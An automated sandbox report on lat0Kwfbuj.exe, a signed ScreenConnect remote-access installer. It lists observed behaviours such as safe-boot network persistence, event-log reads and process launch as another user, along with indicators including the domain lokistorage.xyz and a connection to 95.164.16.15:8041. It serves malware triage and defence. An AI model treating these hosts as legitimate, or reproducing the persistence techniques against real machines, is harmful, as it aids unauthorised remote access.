Windows Analysis Report
lat0Kwfbuj.exe

EXE planting / hijacking vulnerabilities found

Compliance

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe

EXE: msiexec.exe

PE / OLE file has a valid certificate

Uses 32bit PE files

Source: lat0Kwfbuj.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: lat0Kwfbuj.exe

Static PE information: certificate valid

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: lat0Kwfbuj.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: lat0Kwfbuj.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: lat0Kwfbuj.exe
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdbU! source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3438865774.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611032086.0000000002DD2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2610882660.0000000002D80000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611494645.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbI source: lat0Kwfbuj.exe
Source:	Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3453134317.0000000003047000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2617646955.0000000012FB0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: lat0Kwfbuj.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3438865774.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611032086.0000000002DD2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2610882660.0000000002D80000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611494645.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: lat0Kwfbuj.exe
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.2245197043.000000000029D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: lat0Kwfbuj.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.2221560120.0000000004B2B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: lat0Kwfbuj.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.2221560120.0000000004ABA000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: lat0Kwfbuj.exe, MSI8C55.tmp.3.dr, 488619.msi.3.dr, MSI884C.tmp.3.dr, 48861b.msi.3.dr, MSI888B.tmp.3.dr, setup.msi.0.dr, 48861a.rbs.3.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3453134317.0000000003047000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2617646955.0000000012FB0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2257604970.00000000004F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
Source:	Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: lat0Kwfbuj.exe, MSI805D.tmp.2.dr, 488619.msi.3.dr, 48861b.msi.3.dr, setup.msi.0.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611213053.0000000002F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.3453134317.0000000003047000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2617646955.0000000012FB0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: lat0Kwfbuj.exe

Spreading

Checks for available system drives (often done to infect USB drives)

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Networking

Enables network access during safeboot for specific services

Source: C:\Windows\System32\msiexec.exe

Registry value created: NULL Service

Performs DNS queries to domains with low reputation

Source:

DNS query: lokistorage.xyz

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49723 -> 95.164.16.15:8041

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: NASSIST-ASGI NASSIST-ASGI

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.6:49775
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.6:49801

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: lokistorage.xyz

Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2617646955.0000000012FB0000.00000004.00000800.00020000.00000000.sdmp, lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2617646955.0000000012FB0000.00000004.00000800.00020000.00000000.sdmp, lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: ScreenConnect.ClientService.exe, 00000008.00000002.3441561097.00000000022A9000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2611494645.0000000003427000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rundll32.exe, 00000005.00000003.2221560120.0000000004ABA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2221560120.0000000004B2B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr	String found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
Source: rundll32.exe, 00000005.00000003.2221560120.0000000004ABA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2221560120.0000000004B2B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr	String found in binary or memory: http://wixtoolset.org/news/
Source: rundll32.exe, 00000005.00000003.2221560120.0000000004ABA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2221560120.0000000004B2B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr	String found in binary or memory: http://wixtoolset.org/releases/
Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: ScreenConnect.WindowsCredentialProvider.dll.3.dr	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: ScreenConnect.Core.dll.3.dr	String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Reads the System eventlog

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior

System Summary

Detected potential unwanted application

Source: lat0Kwfbuj.exe

PE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US

Contains functionality to launch a process as a different user

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

Code function: 8_2_05EF28B0 CreateProcessAsUserW,

8_2_05EF28B0

Creates files inside the system directory

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\488619.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI884C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI888B.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8C55.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\48861b.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\48861b.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}\DefaultIcon	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Windows\Installer\wix{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}.SchedServiceConfig.rmi	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)\fobt51ho.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)\fobt51ho.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log	Jump to behavior

Deletes files inside the Windows folder

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI888B.tmp

Detected potential crypto function

Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Code function: 0_2_055EEC60	0_2_055EEC60
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Code function: 0_2_055E9C90	0_2_055E9C90
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Code function: 0_2_055E6AB8	0_2_055E6AB8
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Code function: 0_2_055E6080	0_2_055E6080
Source: C:\Users\user\Desktop\lat0Kwfbuj.exe	Code function: 0_2_055E6AA8	0_2_055E6AA8
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Code function: 8_2_014FD598	8_2_014FD598
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Code function: 8_2_05EF0040	8_2_05EF0040
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Code function: 8_2_05EF0040	8_2_05EF0040
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340C06D3	9_2_00007FFD340C06D3
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340BECED	9_2_00007FFD340BECED
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340BDCF2	9_2_00007FFD340BDCF2
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340BED2D	9_2_00007FFD340BED2D
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340B703D	9_2_00007FFD340B703D
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340DEFA0	9_2_00007FFD340DEFA0
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340D9914	9_2_00007FFD340D9914
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340E340D	9_2_00007FFD340E340D
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340DECA5	9_2_00007FFD340DECA5
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340E0CFA	9_2_00007FFD340E0CFA
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340D9D50	9_2_00007FFD340D9D50
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340DEDD3	9_2_00007FFD340DEDD3
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340E95CD	9_2_00007FFD340E95CD
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340DDDDD	9_2_00007FFD340DDDDD
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340E9670	9_2_00007FFD340E9670
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340E7668	9_2_00007FFD340E7668
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340E4715	9_2_00007FFD340E4715
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340DEB11	9_2_00007FFD340DEB11
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340E03FA	9_2_00007FFD340E03FA
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD340EF458	9_2_00007FFD340EF458
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD343C5CB6	9_2_00007FFD343C5CB6
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD343C6ED3	9_2_00007FFD343C6ED3
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD343C0339	9_2_00007FFD343C0339
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD343C1313	9_2_00007FFD343C1313
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD343C639B	9_2_00007FFD343C639B
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD340BBCD3	10_2_00007FFD340BBCD3
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD340C06D3	10_2_00007FFD340C06D3
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFD340B703D	10_2_00007FFD340B703D
